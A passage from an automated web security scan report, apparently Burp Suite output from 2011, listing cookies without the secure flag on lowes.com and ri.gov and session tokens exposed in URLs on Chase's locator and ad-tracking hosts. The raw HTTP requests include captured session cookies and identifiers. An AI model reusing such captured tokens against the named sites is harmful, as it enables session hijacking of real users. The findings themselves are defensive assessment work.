fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Nov 2010 21:24:51 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 11
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* empty */

7.112. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
ETag: "1f8e59-22f6-dc02bc00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it u
...[SNIP]...

7.113. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 00:52:35 GMT
Set-Cookie: TS176ebc=8af291dbf163c57592847d6d73d5eb85d172642e494065004e1ce3f1; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...

7.114. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; cmSessionDepth=2; lowes-prefs={"zipin":{"show":false}}; stop_mobi=yes; TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 21:31:37 GMT
Content-Length: 68157
Connection: keep-alive
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:37 GMT
Set-Cookie: TS176ebc=3557926829ef74993d5214d92b1ba1ff3ddff0b185006e134e1cbb8e; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta chars
...[SNIP]...

7.115. https://www.ri.gov/Licensing/renewal/license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ri.gov
Path:   /Licensing/renewal/license.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Licensing/renewal/license.php HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 302 Found
Date: Wed, 13 Jul 2011 00:33:56 GMT
Server: www
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 13 Jul 2011 00:33:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; path=/
Location: /Licensing/
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


8. Session token in URL  previous  next
There are 10 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=2996&token=LOW21 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2%0A1443%3B07%2F26%2F2011%3BNETM7; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/
Set-Cookie: cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B07%2F26%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21; Domain=.contextweb.com; Expires=Wed, 15-Jun-2016 21:30:51 GMT; Path=/
Content-Type: image/gif
Date: Tue, 12 Jul 2011 21:30:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.2. http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://blog.katango.com
Path:   /2011/07/05/how-facebook-affects-your-relationships-infographic/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/07/05/how-facebook-affects-your-relationships-infographic/ HTTP/1.1
Host: blog.katango.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hiab=nnascar; __qca=P0-1347206192-1310503617547

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://blog.katango.com/xmlrpc.php
Link: <http://wp.me/p1Alwm-6p>; rel=shortlink
Content-Length: 31215

<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" dir="ltr" lang="en">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" dir="ltr" lang="en">
<![endif]-->
<!--[if (!IE)]><!-->
<html dir="ltr" lang="en">
<!--<![e
...[SNIP]...
<div id="wpl-button"><a href='http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/?like=1&amp;_wpnonce=e687d1efc9' title='I like this post' class='like needs-login' rel='nofollow'><span>
...[SNIP]...

8.3. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 12 Jul 2011 21:30:49 GMT
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 455
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2996&token=LOW21" width="1" height="1" border="0">    <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=lowesz_cs=1&betq=13252=436547" width = "1" height = "1" border = "0">
...[SNIP]...

8.4. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://gw-services.vtrenz.net
Path:   /WebCookies/RegisterWebPageVisit.cfm

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /WebCookies/RegisterWebPageVisit.cfm?accesskey=383ED628-AF06-4463-81DC-7F3477CEDFC3&v=2.02&isNewSession=1&type=pageview&sessionGUID=01294291-8d37-4c5e-56e4-79da9e81677a&webSyncID=14653cc8-09d7-804a-cc8b-04c4bccba599&url=http%3A%2F%2Ftrustedcs.com%2F&hostname=trustedcs.com&pathname=%2F HTTP/1.1
Host: gw-services.vtrenz.net
Proxy-Connection: keep-alive
Referer: http://trustedcs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerb2b-gw-services.vtrenz.net-http=206010378.20480.0000

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 12 Jul 2011 18:09:11 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Content-Length: 0


8.5. https://locator.chase.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
   <img src="/images/logo107x20.gif;jsessionid=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.6. https://locator.chase.com/LocatorAction.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /LocatorAction.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /LocatorAction.do;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...

8.7. https://locator.chase.com/LocatorAction.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /LocatorAction.do

